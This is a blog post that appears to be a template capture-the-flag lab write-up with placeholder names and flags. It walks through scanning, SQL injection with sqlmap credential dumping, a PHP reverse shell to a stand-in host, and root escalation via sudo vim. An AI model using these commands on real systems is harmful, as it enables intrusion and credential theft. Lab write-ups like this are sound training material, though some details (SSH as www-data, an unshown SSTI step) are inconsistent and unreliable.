Blog
CyberTask - ChallengeName Writeup

CyberTask - ChallengeName Writeup

December 25, 2024·
YourName

Quick Info

Property Value
Platform CyberTask
Category Cyber Range Lab
Difficulty Medium
IP 10.10.10.xxx
Techniques SQLi, SSTI, Sudo Abuse

TL;DR Summary

  1. Found web app on port 80 with SQL injection
  2. Extracted credentials from database
  3. SSH access as user www-data
  4. Privilege escalation via sudo misconfiguration

Reconnaissance

What ports are open?

Running Nmap to discover open ports:

nmap -sCV -p- -oN nmap/full.txt 10.10.10.xxx

Results:

nmap/full.txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
80/tcp open  http    Apache 2.4.41
Port 80 is open — let’s enumerate the web application first.

Enumeration

Directory Bruteforce 

gobuster dir -u http://10.10.10.xxx -w /usr/share/wordlists/dirb/common.txt

Found directories:

  • /admin — Login panel
  • /uploads — File upload functionality
  • /api — REST API endpoints

What technology is the website using?

Always check for technology stack before attacking!

Using whatweb:

whatweb http://10.10.10.xxx

Output:

Apache 2.4.41 | PHP 7.4 | Bootstrap

Exploitation

How to exploit the SQL Injection?

Found SQLi in login form at /admin:

' OR 1=1-- -
Only use these techniques on CyberTask labs or systems you own!

Step 1: Confirm SQLi 

sqlmap -u "http://10.10.10.xxx/admin" --forms --dbs

Step 2: Dump Credentials 

sqlmap -u "http://10.10.10.xxx/admin" --forms -D webapp -T users --dump

Found credentials:

Username Password
admin Sup3rS3cr3t!
john password123

Getting Reverse Shell

Upload PHP reverse shell:

shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>

Start listener:

nc -lvnp 4444
Pro Tip: Always upgrade your shell immediately after connection!

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg

Privilege Escalation

How to escalate to root?

Check sudo permissions:

sudo -l

Output:

User www-data may run the following commands:
    (ALL) NOPASSWD: /usr/bin/env
    (ALL) NOPASSWD: /usr/bin/vim
Found sudo misconfiguration! Check GTFOBins for exploitation.

Root via vim 

sudo vim -c ':!/bin/bash'

Got root! 🎉

root@machine:~# whoami
root
root@machine:~# cat /root/root.txt

Flags

Flag Value
User CTF{user_flag_here}
Root CTF{root_flag_here}

Lessons Learned

SQL Injection
Learn more about SQLi techniques
 Linux PrivEsc
Common privilege escalation methods

Key Takeaways

  1. Always enumerate thoroughly — Don’t rush to exploitation
  2. Check sudo permissions — Common misconfiguration vector
  3. Use GTFOBins — Great resource for privilege escalation

Tools Used

  • nmap — Port scanning
  • gobuster — Directory bruteforce
  • sqlmap — SQL injection automation
  • burpsuite — Web proxy

References

FAQ

What is the initial foothold?

SQL injection in the admin login panel leads to credential disclosure, which allows SSH access.

How long did this lab take?

Approximately 2-3 hours for initial foothold, 30 minutes for privilege escalation.

Can this be done without sqlmap?

Yes! Manual SQLi exploitation is possible using UNION-based injection.

My First CTF Writeup v1Getting Started with Metasploit in Kali Linux